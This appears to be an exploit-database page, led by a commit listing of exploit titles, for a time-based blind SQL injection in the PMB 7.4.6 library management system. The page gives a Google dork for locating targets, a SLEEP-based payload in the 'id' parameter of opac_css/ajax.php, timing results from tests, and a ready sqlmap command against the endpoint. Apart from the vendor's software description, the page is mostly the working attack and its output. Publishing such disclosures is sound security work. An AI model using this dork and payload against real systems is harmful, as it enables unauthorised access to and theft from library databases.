3a3c03321c
18 changes to exploits/shellcodes/ghdb Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution ABB FlowX v4.00 - Exposure of Sensitive Information TP-Link TL-WR740N - Authenticated Directory Transversal Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) Blackcat Cms v1.4 - Remote Code Execution (RCE) Blackcat Cms v1.4 - Stored XSS CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) Online Piggery Management System v1.0 - unauthenticated file upload vulnerability phpfm v1.7.9 - Authentication type juggling PimpMyLog v1.7.14 - Improper access control PMB 7.4.6 - SQL Injection Statamic 4.7.0 - File-Inclusion Vaidya-Mitra 1.0 - Multiple SQLi
54 lines
No EOL
2 KiB
Text
54 lines
No EOL
2 KiB
Text
# Exploit Title: PMB 7.4.6 - SQL Injection
|
|
# Google Dork: inurl:opac_css
|
|
# Date: 2023-01-06
|
|
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
|
|
# Vendor Homepage: http://www.sigb.net
|
|
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
|
|
# Affected versions : <= 7.4.6
|
|
|
|
-==== Software Description ====-
|
|
|
|
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
|
|
We are some librarians, users and developers deploring this state of affairs.
|
|
|
|
PMB is based on web technology. This is what we sometimes call a 'web-app'.
|
|
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
|
|
|
|
The main functions of PMB are :
|
|
|
|
* Supporting the UNIMARC format
|
|
* Authorities management (authors, publishers, series, subjects...)
|
|
* Management of loans, holds, borrowers...
|
|
* A user-friendly configuration
|
|
* The ability to import full bibliographic records
|
|
* A user-friendly OPAC integrating a browser
|
|
* Loans management with a module designed to serve even the very small establishments
|
|
* Serials management
|
|
* Simple administration procedures that can be handled easily even by the library staff...
|
|
|
|
-==== Vulnerability ====-
|
|
|
|
URL:
|
|
https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
|
|
|
|
Parameter:
|
|
id
|
|
|
|
-==== Vulnerability Details ====-
|
|
|
|
URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)
|
|
|
|
Tests performed:
|
|
|
|
if(now()=sysdate(),sleep(15),0) => 15.43
|
|
if(now()=sysdate(),sleep(6),0) => 6.445
|
|
if(now()=sysdate(),sleep(15),0) => 15.421
|
|
if(now()=sysdate(),sleep(3),0) => 3.409
|
|
if(now()=sysdate(),sleep(0),0) => 0.415
|
|
if(now()=sysdate(),sleep(0),0) => 0.413
|
|
if(now()=sysdate(),sleep(6),0) => 6.41
|
|
|
|
Using SQLMAP :
|
|
|
|
|
|
sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id" |